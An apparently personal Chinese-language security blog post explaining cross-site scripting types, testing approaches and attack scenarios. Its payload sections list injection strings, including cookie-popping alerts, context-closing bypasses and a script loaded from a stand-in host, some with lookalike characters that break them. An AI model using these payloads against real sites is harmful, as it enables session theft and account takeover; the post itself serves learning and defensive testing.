<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>XSS | Luanne</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="0x00：参考 https:&#x2F;&#x2F;juejin.cn&#x2F;post&#x2F;6912030758404259854https:&#x2F;&#x2F;www.cnblogs.com&#x2F;csnd&#x2F;p&#x2F;11807592.html  0x01：XSS 原理跨站脚本攻击XSS(Cross Site Scripting)XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS">
<meta property="og:url" content="http://icecream102.github.io/2022/11/08/XSS/index.html">
<meta property="og:site_name" content="Luanne">
<meta property="og:description" content="0x00：参考 https:&#x2F;&#x2F;juejin.cn&#x2F;post&#x2F;6912030758404259854https:&#x2F;&#x2F;www.cnblogs.com&#x2F;csnd&#x2F;p&#x2F;11807592.html  0x01：XSS 原理跨站脚本攻击XSS(Cross Site Scripting)XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://icecream102.github.io/2022/11/08/XSS/a5daba88db174a22a5938474a5f48431.png">
<meta property="og:image" content="http://icecream102.github.io/2022/11/08/XSS/70099b67949340a0b1ab4cbe9e8d8887.png">
<meta property="og:image" content="http://icecream102.github.io/2022/11/08/XSS/581a17bc980845dea8b61091a3428b19.png">
<meta property="article:published_time" content="2022-11-07T19:50:17.000Z">
<meta property="article:modified_time" content="2022-11-07T06:58:58.503Z">
<meta property="article:author" content="Luanne">
<meta property="article:tag" content="网络安全 XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://icecream102.github.io/2022/11/08/XSS/a5daba88db174a22a5938474a5f48431.png">
  
    <link rel="alternate" href="/atom.xml" title="Luanne" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Luanne</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://Icecream102.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-XSS" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/11/08/XSS/" class="article-date">
  <time class="dt-published" datetime="2022-11-07T19:50:17.000Z" itemprop="datePublished">2022-11-07</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      XSS
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="0x00：参考"><a href="#0x00：参考" class="headerlink" title="0x00：参考"></a>0x00：参考</h1><blockquote>
<p><a target="_blank" rel="noopener" href="https://juejin.cn/post/6912030758404259854">https://juejin.cn/post/6912030758404259854</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/csnd/p/11807592.html">https://www.cnblogs.com/csnd/p/11807592.html</a></p>
</blockquote>
<h1 id="0x01：XSS-原理"><a href="#0x01：XSS-原理" class="headerlink" title="0x01：XSS 原理"></a>0x01：XSS 原理</h1><p>跨站脚本攻击XSS(Cross Site Scripting)<br>XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于<strong>更高的权限</strong>（如执行一些操作）、<strong>私密网页内容</strong>、<strong>会话</strong>和<strong>cookie</strong>等各种内容。</p>
<h1 id="0x02：XSS类型"><a href="#0x02：XSS类型" class="headerlink" title="0x02：XSS类型"></a>0x02：XSS类型</h1><h2 id="1-存储型"><a href="#1-存储型" class="headerlink" title="1.存储型"></a>1.存储型</h2><p><strong>持久化</strong>，代码是存储在<strong>服务器</strong>中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。<br>这种XSS比较危险，容易造成蠕虫，盗窃cookie。</p>
<p><img src="/2022/11/08/XSS/a5daba88db174a22a5938474a5f48431.png" alt="在这里插入图片描述"></p>
<h2 id="2-反射型"><a href="#2-反射型" class="headerlink" title="2.反射型"></a>2.反射型</h2><p><strong>非持久化</strong>，需要欺骗用户自己去<strong>点击链接</strong>才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在<strong>搜索页面</strong>。<br>反射型XSS大多数是用来盗取用户的Cookie信息。<br><img src="/2022/11/08/XSS/70099b67949340a0b1ab4cbe9e8d8887.png" alt="在这里插入图片描述"></p>
<h2 id="3-DOM型"><a href="#3-DOM型" class="headerlink" title="3.DOM型"></a>3.DOM型</h2><p>不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过<strong>url传入参数</strong>去控制触发的，其实也属于反射型XSS。</p>
<p>可能触发DOM型XSS的属性:</p>
<ul>
<li>document.referer</li>
<li>window.name</li>
<li>location</li>
<li>innerHTML</li>
<li>documen.write</li>
</ul>
<h1 id="0x03：XSS攻击载荷"><a href="#0x03：XSS攻击载荷" class="headerlink" title="0x03：XSS攻击载荷"></a>0x03：XSS攻击载荷</h1><h2 id="lt-script-gt"><a href="#lt-script-gt" class="headerlink" title="&lt;script&gt;"></a><code>&lt;script&gt;</code></h2><p><code>&lt;script&gt;</code>标签是最直接的XSS有效载荷，脚本标记可以引用外部的JavaScript代码，也可以将代码插入脚本标记中</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="string">&quot;hack&quot;</span>)&lt;/script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="regexp">/hack/</span>)&lt;/script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;        #弹出<span class="number">1</span>，对于数字可以不用引号</span><br><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="variable language_">document</span>.<span class="property">cookie</span>)&lt;/script&gt;      #弹出cookie</span><br><span class="line">&lt;script src=<span class="attr">http</span>:<span class="comment">//xxx.com/xss.js&gt;&lt;/script&gt;  #引用外部的xss</span></span><br></pre></td></tr></table></figure>

<h2 id="lt-svg-gt"><a href="#lt-svg-gt" class="headerlink" title="&lt;svg&gt;"></a><code>&lt;svg&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=<span class="string">&quot;alert(1)&quot;</span>&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;alert(1)&quot;</span>//</span></span></span><br></pre></td></tr></table></figure>

<h2 id="lt-img-gt"><a href="#lt-img-gt" class="headerlink" title="&lt;img&gt;"></a><code>&lt;img&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img  src=<span class="number">1</span>  οnerrοr=<span class="title function_">alert</span>(<span class="string">&quot;hack&quot;</span>)&gt;</span><br><span class="line">&lt;img  src=1  οnerrοr=alert(document.cookie)&gt;  #弹出cookie</span><br><span class="line">&lt;img src=javascript:alert(&#x27;XSS&#x27;)&gt;</span><br><span class="line">&lt;img src=JaVaScRiPt:alert(&#x27;XSS&#x27;)&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="lt-body-gt"><a href="#lt-body-gt" class="headerlink" title="&lt;body&gt;"></a><code>&lt;body&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;body οnlοad=<span class="title function_">alert</span>(<span class="number">1</span>)&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">body</span> <span class="attr">οnpageshοw</span>=<span class="string">alert(1)</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="lt-video-gt"><a href="#lt-video-gt" class="headerlink" title="&lt;video&gt;"></a><code>&lt;video&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;video οnlοadstart=<span class="title function_">alert</span>(<span class="number">1</span>) src=<span class="string">&quot;/media/hack-the-planet.mp4&quot;</span> /&gt;</span><br></pre></td></tr></table></figure>

<h2 id="lt-style-gt"><a href="#lt-style-gt" class="headerlink" title="&lt;style&gt;"></a><code>&lt;style&gt;</code></h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;style οnlοad=<span class="title function_">alert</span>(<span class="number">1</span>)&gt;&lt;/style&gt;</span><br></pre></td></tr></table></figure>

<h1 id="0x05：XSS插入位置"><a href="#0x05：XSS插入位置" class="headerlink" title="0x05：XSS插入位置"></a>0x05：XSS插入位置</h1><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#用户输入作为<span class="variable constant_">HTML</span>注释内容，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;!-- 用户输入 --&gt;</span><br><span class="line">&lt;!-- --&gt;<span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span>&lt;!-- --&gt;</span><br><span class="line"></span><br><span class="line">#用户输入作为标签属性名，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;div 用户输入=<span class="string">&quot;xx&quot;</span>&gt;  &lt;/div&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">div</span> &gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><span class="language-xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">a</span>=<span class="string">&quot;xx&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line">#用户输入作为标签属性值，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;div id=<span class="string">&quot;用户输入&quot;</span>&gt;&lt;/div&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">&quot;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&#x27;hack&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><span class="language-xml"><span class="tag">&lt;<span class="name">div</span> <span class="attr">a</span>=<span class="string">&quot;x&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line">#用户输入作为标签名，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;用户输入  id=<span class="string">&quot;xx&quot;</span> /&gt;</span><br><span class="line">&lt;&gt;&lt;script&gt;alert(&#x27;hack&#x27;)&lt;/script&gt;&lt;b id=&quot;xx&quot; /&gt;</span><br><span class="line"></span><br><span class="line">#用户输入作为CSS内容，导致攻击者可以进行闭合绕过</span><br><span class="line">&lt;style&gt;用户输入&lt;style&gt;</span><br><span class="line">&lt;style&gt; &lt;/style&gt;&lt;script&gt;alert(&#x27;hack&#x27;)&lt;/script&gt;&lt;style&gt; &lt;/style&gt;</span><br></pre></td></tr></table></figure>

<h1 id="0x06-XSS漏洞的挖掘"><a href="#0x06-XSS漏洞的挖掘" class="headerlink" title="0x06: XSS漏洞的挖掘"></a>0x06: XSS漏洞的挖掘</h1><h2 id="黑盒测试"><a href="#黑盒测试" class="headerlink" title="黑盒测试"></a>黑盒测试</h2><p>尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：</p>
<ul>
<li>URL的每一个参数</li>
<li>URL本身</li>
<li>表单</li>
<li>搜索框</li>
</ul>
<p>常见业务场景</p>
<ul>
<li>重灾区：评论区、留言区、个人信息、订单信息等</li>
<li>针对型：站内信、网页即时通讯、私信、意见反馈</li>
<li>存在风险：搜索框、当前目录、图片属性等</li>
</ul>
<h2 id="白盒测试（代码审计）"><a href="#白盒测试（代码审计）" class="headerlink" title="白盒测试（代码审计）"></a>白盒测试（代码审计）</h2><p>关于XSS的代码审计主要就是从<strong>接收参数</strong>的地方和一些<strong>关键词</strong>入手。</p>
<p><strong>PHP中</strong>常见的接收参数的方式有<code>$_GET</code>、<code>$_POST</code>、<code>$_REQUEST</code>等等，可以搜索所有接收参数的地方。然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看输出到页面中的数据是否进行了<strong>过滤</strong>和<strong>html编码</strong>等处理。</p>
<p>也可以搜索类似<code>echo</code>这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取的，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。</p>
<p>大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些<strong>公共函数</strong>看有没有过滤，能否绕过等等。</p>
<p>同理审计DOM型注入可以搜索一些js操作DOM元素的关键词进行审计。</p>
<h1 id="0x07-XSS攻击过程"><a href="#0x07-XSS攻击过程" class="headerlink" title="0x07: XSS攻击过程"></a>0x07: XSS攻击过程</h1><h2 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h2><ol>
<li>Bob拥有一个Web站点，该站点允许用户发布信息&#x2F;浏览已发布的信息。 </li>
<li>Tom检测到Bob的站点存在存储型的XSS漏洞。</li>
<li>Tom在Bob的网站上发布一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其它用户来阅读该热点信息。</li>
<li>Bob或者是任何的其他人如Alice浏览该信息之后,Tom的恶意脚本就会执行。</li>
<li>Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发动一起XSS攻击</li>
</ol>
<h2 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a>反射型</h2><ol>
<li>Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点需要Alice使用用户名&#x2F;密码进行登录，并存储了Alice敏感信息(比如银行帐户信息)。</li>
<li>Tom 发现 Bob的站点存在反射性的XSS漏洞 </li>
<li>Tom利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱使Alice点击</li>
<li>Alice在登录到Bob的站点后，浏览了 Tom 提供的恶意链接</li>
<li>嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、帐号信息等信息)。然后在Alice完全不知情的情况下将这些信息发送给Tom。 </li>
<li>Tom 利用获取到的cookie就可以以Alice的身份登录Bob的站点，如果脚本的功更强大的话，Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制</li>
</ol>
<h1 id="0x08-XSS漏洞的危害"><a href="#0x08-XSS漏洞的危害" class="headerlink" title="0x08: XSS漏洞的危害"></a>0x08: XSS漏洞的危害</h1><p>存储型的XSS危害最大。因为他存储在服务器端，所以不需要我们和被攻击者有任何接触，只要被攻击者访问了该页面就会遭受攻击。<br>反射型和DOM型的XSS则需要我们去诱使用户点击我们构造的恶意的URL，需要我们和用户有直接或者间接的接触，比如利用社会工程学或者利用在其他网页挂马的方式。<br><img src="/2022/11/08/XSS/581a17bc980845dea8b61091a3428b19.png" alt="在这里插入图片描述"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://icecream102.github.io/2022/11/08/XSS/" data-id="cla6fv9j800007cu03d5yalbg" data-title="XSS" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-XSS/" rel="tag">网络安全 XSS</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/11/08/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          恶意代码
        
      </div>
    </a>
  
  
    <a href="/2022/10/26/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98Lab3-3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">恶意代码分析实战 Lab3_3</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81-%E9%80%86%E5%90%91/" rel="tag">恶意代码 逆向</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-XSS/" rel="tag">网络安全 XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81/" rel="tag">网络安全 恶意代码</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81-%E9%80%86%E5%90%91/" style="font-size: 10px;">恶意代码 逆向</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-XSS/" style="font-size: 10px;">网络安全 XSS</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81/" style="font-size: 10px;">网络安全 恶意代码</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/11/08/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81/">恶意代码</a>
          </li>
        
          <li>
            <a href="/2022/11/08/XSS/">XSS</a>
          </li>
        
          <li>
            <a href="/2022/10/26/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98Lab3-3/">恶意代码分析实战 Lab3_3</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 Luanne<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>